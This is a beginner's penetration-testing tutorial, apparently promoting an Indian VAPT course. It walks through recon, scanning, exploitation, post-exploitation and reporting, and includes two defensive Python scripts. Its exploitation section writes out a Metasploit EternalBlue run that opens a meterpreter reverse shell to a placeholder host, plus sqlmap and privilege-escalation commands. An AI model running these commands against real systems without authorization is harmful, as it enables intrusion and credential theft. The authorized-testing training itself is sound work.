Penetration Testing Tutorial: Step-by-Step Complete Guide for Beginners
Penetration testing is one of the most important skills for a cybersecurity career in India. This penetration testing tutorial teaches you the methodology to think and work like a professional pentester, from reconnaissance through to the final report.
What Is Penetration Testing
Penetration testing, or pentesting, is an authorized simulated attack carried out to find vulnerabilities in an organization's computer systems, networks, or web applications. A pentester uses the same tools and techniques that real attackers use, but with proper authorization.
Penetration testing is an important component of VAPT (Vulnerability Assessment and Penetration Testing). A vulnerability assessment only identifies weaknesses, whereas penetration testing actually exploits those weaknesses to demonstrate their real impact.
The number of cyber attacks in India is rising. According to CERT-In, more than 1.3 million cybersecurity incidents were reported in 2023. These statistics show why a penetration testing tutorial is in such demand in India.
Penetration Testing Methodology Standards
Professional pentesting follows established frameworks. Some industry-standard methodologies:
The OWASP Testing Guide is the widely accepted framework for web applications. PTES (Penetration Testing Execution Standard) defines the methodology comprehensively. NIST SP 800-115 is the US government standard for technical security assessments. These frameworks ensure structured and thorough testing.
Penetration Testing Phases: Step by Step
Phase 1: Reconnaissance (Information Gathering)
This is the most important phase of pentesting, because the information you gather here defines the direction of the entire engagement.
#### Passive Reconnaissance
Here, publicly available information about the target is collected without directly touching the target system. OSINT tools such as theHarvester, Maltego, Shodan, and Google Dorking are used. Extracting information from social media profiles, company websites, and public databases is part of this phase.
#### Active Reconnaissance
Here the target system is interacted with directly, which includes port scanning, DNS enumeration, and network mapping. This phase gives faster results, but the risk of detection is higher.
```bash
# Passive OSINT: harvest e-mail addresses and subdomains for the target domain from Google
theHarvester -d target.com -b google
# Launch Maltego Community Edition for visual link analysis
maltegoce
# Query Shodan for internet-exposed hosts matching the target name
shodan search "target_name"
```
Phase 2: Scanning
After information gathering, the scanning phase collects detailed data about the target.
#### Port Scanning with Nmap
```bash
# SYN scan of all 65535 TCP ports with service version detection; -oA writes .nmap, .gnmap and .xml files
nmap -sS -sV -p- -T4 -oA scan_results 192.168.1.0/24
```
A TCP SYN scan (-sS) is fast and relatively stealthy. Service version detection (-sV) reveals which service is running on each port. Operating system detection (-O) can identify the target's OS.
#### Vulnerability Scanning
Automated vulnerability scanners such as Nessus, OpenVAS, or Nexpose are used to assess vulnerabilities. These tools identify CVEs (Common Vulnerabilities and Exposures) and assign risk scores.
```bash
# Start the OpenVAS services (legacy start script; newer installs use Greenbone's gvm tooling)
openvas-start
# Scan the web server for known dangerous files and outdated server software
nikto -h https://target.com
```
Phase 3: Exploitation
In the exploitation phase, confirmed vulnerabilities are actually exploited on the target system.
#### Using Metasploit Framework
```bash
msfconsole
search type:exploit name:smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST your_ip
exploit
```
#### Manual Exploitation
Many vulnerabilities must be exploited manually. For SQL injection, XSS, and business logic flaws, automated tools alone are not enough.
```bash
sqlmap -u "http://target.com/page?id=1" --dbs
burpsuite
```
#### Social Engineering Attacks
Phishing emails, pretexting, and vishing calls can also be part of a pentest if they are included in the scope.
Phase 4: Post-Exploitation
Once initial access is obtained, the post-exploitation phase focuses on how much damage an attacker could do.
#### Privilege Escalation
Gaining higher privileges from a limited account. On Linux, SUID binaries, sudo misconfigurations, and kernel exploits are checked. On Windows, service misconfigurations, stored credentials, and unquoted service paths are exploited.
```bash
# Linux privilege escalation checks
find / -perm -4000 -type f 2>/dev/null   # list all SUID binaries
sudo -l                                   # commands the current user may run through sudo
chmod +x linpeas.sh && ./linpeas.sh       # automated enumeration; the script must be executable
# Windows privilege escalation checks (run in cmd.exe / PowerShell, not in bash)
whoami /priv
accesschk.exe -uwcqv "Users" *
powershell -c ". .\PowerUp.ps1; Invoke-AllChecks"   # dot-source PowerUp, then run all its checks
```
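The `find / -perm -4000` listing above is only meaningful when compared with what the system is supposed to have: a SUID binary in /opt or a SUID copy of an interpreter is the kind of finding that goes into the report. The script below is an added example, not code from the original tutorial; BASELINE_SUID and FIND_OUTPUT are constructed sample data (a real baseline would be captured from a trusted image of the same distribution), and the function names are this example's own.

```python
"""Audit the SUID binaries found on a host against a known-good baseline.

Added example, not code from the original tutorial. BASELINE_SUID and
FIND_OUTPUT are constructed samples, not data from any real system.
"""

# Constructed baseline: SUID binaries expected on this hypothetical image.
BASELINE_SUID = {
    "/usr/bin/sudo",
    "/usr/bin/passwd",
    "/usr/bin/su",
    "/usr/bin/mount",
    "/usr/bin/umount",
    "/usr/bin/chsh",
    "/usr/bin/newgrp",
}

# Constructed `find / -perm -4000 -type f 2>/dev/null` output from the host under test.
FIND_OUTPUT = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/python3.10
/opt/backup/bkp-helper
"""

# Directories where distribution-managed SUID binaries normally live.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def parse_find_output(text):
    """Turn newline-separated find output into a set of absolute paths."""
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}


def classify(path):
    """HIGH for SUID files outside system directories (vendor/custom code), REVIEW otherwise."""
    return "REVIEW" if path.startswith(SYSTEM_DIRS) else "HIGH"


def audit_suid(found, baseline):
    """Return (unexpected, missing): SUID files not in the baseline, and baseline entries absent from the host."""
    return sorted(found - baseline), sorted(baseline - found)


def report(found, baseline):
    """Human-readable summary for the technical findings section."""
    unexpected, missing = audit_suid(found, baseline)
    lines = [f"[{classify(p)}] unexpected SUID binary: {p}" for p in unexpected]
    lines += [f"[INFO] baseline SUID binary not present on host: {p}" for p in missing]
    return "\n".join(lines) if lines else "OK: SUID set matches baseline"


if __name__ == "__main__":
    print(report(parse_find_output(FIND_OUTPUT), BASELINE_SUID))
```

Entries missing from the host are reported as informational because they usually mean a package was not installed, whereas an unexpected SUID file under /opt or /home is a finding that needs its own justification from the system owner.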
#### Lateral Movement
Moving horizontally through the network, from one compromised system to another.
#### Data Exfiltration
Identifying and extracting the sensitive data that an attacker could access.
#### Persistence Establishment
Maintaining permanent access to the system so that access can be regained even if the connection is cut.
Phase 5: Reporting
The result of a professional pentest is only valuable when it is written up in a proper report.
#### Executive Summary
A short overview for non-technical stakeholders that focuses on business impact.
#### Technical Findings
For each vulnerability:
- Description and severity (with CVSS score)
- Steps to reproduce, with screenshots
- Impact analysis
- Proof of concept (PoC)
- Remediation recommendations, with priority
#### Risk Assessment
Categorizing vulnerabilities by likelihood and impact: Critical, High, Medium, Low.
#### Remediation Roadmap
Actionable steps, with a timeline, prioritizing the fixes for the most important vulnerabilities first.
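The risk assessment and remediation roadmap above come down to a repeatable rule: map each finding's CVSS score to a severity band, then order the findings so the report's priority list follows from the data rather than from opinion. The script below is an added example, not code from the original tutorial. The severity bands are the CVSS v3.1 qualitative rating scale; the SLA days per severity and the findings in SAMPLE_FINDINGS are constructed sample values, and treating internet-facing assets as higher priority within a band is this example's own assumption.

```python
"""Rate findings by CVSS v3.1 base score and order them into a remediation roadmap.

Added example, not from the original tutorial. Severity bands follow the
CVSS v3.1 qualitative rating scale (None 0.0, Low 0.1-3.9, Medium 4.0-6.9,
High 7.0-8.9, Critical 9.0-10.0). SLA_DAYS and SAMPLE_FINDINGS are
constructed sample data, not a standard.
"""
from dataclasses import dataclass


@dataclass
class Finding:
    title: str
    cvss: float
    asset: str
    internet_facing: bool = False  # assumption: exposure raises priority within a severity band


def cvss_severity(score):
    """Map a CVSS v3.1 base score to its qualitative rating."""
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS score out of range: {score}")
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


# Constructed remediation targets (days) per severity for the sample roadmap.
SLA_DAYS = {"Critical": 7, "High": 30, "Medium": 90, "Low": 180, "None": None}


def build_roadmap(findings):
    """Return findings ordered by severity, then exposure, then score, each with severity, SLA and priority."""
    rank = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3, "None": 4}
    rows = []
    for f in findings:
        sev = cvss_severity(f.cvss)
        rows.append({"title": f.title, "asset": f.asset, "cvss": f.cvss,
                     "severity": sev, "sla_days": SLA_DAYS[sev],
                     "internet_facing": f.internet_facing})
    # Lower rank first; internet-facing before internal; higher score first within that.
    rows.sort(key=lambda r: (rank[r["severity"]], not r["internet_facing"], -r["cvss"]))
    for i, r in enumerate(rows, start=1):
        r["priority"] = i
    return rows


# Constructed sample findings; the scores are illustrative, not taken from any real assessment.
SAMPLE_FINDINGS = [
    Finding("SQL injection in login form", 9.8, "web-app-01", internet_facing=True),
    Finding("Outdated OpenSSH version", 7.5, "bastion-01", internet_facing=True),
    Finding("Unquoted service path", 7.8, "win-srv-02"),
    Finding("Verbose error messages", 5.3, "web-app-01", internet_facing=True),
    Finding("Missing HttpOnly flag", 3.1, "web-app-01", internet_facing=True),
]

if __name__ == "__main__":
    for r in build_roadmap(SAMPLE_FINDINGS):
        print(f'{r["priority"]}. [{r["severity"]}] {r["title"]} on {r["asset"]} '
              f'(CVSS {r["cvss"]}, fix within {r["sla_days"]} days)')
```

Note that the internal 7.8 finding is ranked below the internet-facing 7.5 one: both are High, and the exposure tie-breaker applies before the raw score, which is the kind of decision the remediation roadmap section of the report should state explicitly.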
Types of Penetration Testing
Network Penetration Testing
Testing internal and external network infrastructure, including firewalls, routers, switches, and VPNs.
Web Application Penetration Testing
Testing web applications according to the OWASP Top 10 framework, identifying SQL injection, XSS, authentication flaws, and business logic vulnerabilities.
Mobile Application Penetration Testing
Security assessment of Android and iOS applications, including testing of the API backend.
Social Engineering Assessment
Phishing simulations and physical security testing to measure employee awareness.
Cloud Penetration Testing
Security assessment of AWS, Azure, or Google Cloud environments for misconfigurations and access control issues.
Tools Required for Penetration Testing
Information Gathering
Maltego for visual link analysis. theHarvester for email and subdomain discovery. Shodan for IoT and server discovery. Recon-ng as an automated reconnaissance framework.
Scanning & Enumeration
Nmap is the industry-standard network scanner. Nessus is a comprehensive vulnerability scanner. Burp Suite for web application testing. Gobuster for directory enumeration.
Exploitation
Metasploit Framework is the most popular exploitation framework. SQLMap for SQL injection automation. Hashcat for GPU-accelerated password cracking. John the Ripper for traditional password cracking.
Post-Exploitation
Mimikatz for Windows credential extraction. PowerSploit for PowerShell-based post-exploitation. LinPEAS for automating Linux privilege escalation checks.
VAPT Tutorial India: Certification & Career Path
After learning penetration testing, certifications validate your skills.
CEH (Certified Ethical Hacker) is EC-Council's certification and is widely recognized in corporate hiring in India. OSCP (Offensive Security Certified Professional) is a hands-on practical exam that is respected globally. eJPT is an entry-level practical certification suitable for beginners.
Cyber Defence's VAPT Professional course covers this penetration testing tutorial with practical labs. Available in Haryana and Hisar, the course provides a CEH-aligned curriculum.
Learning penetration testing is an ongoing process: technologies evolve and attackers discover new techniques. With structured learning and regular practice, you can become a professional pentester.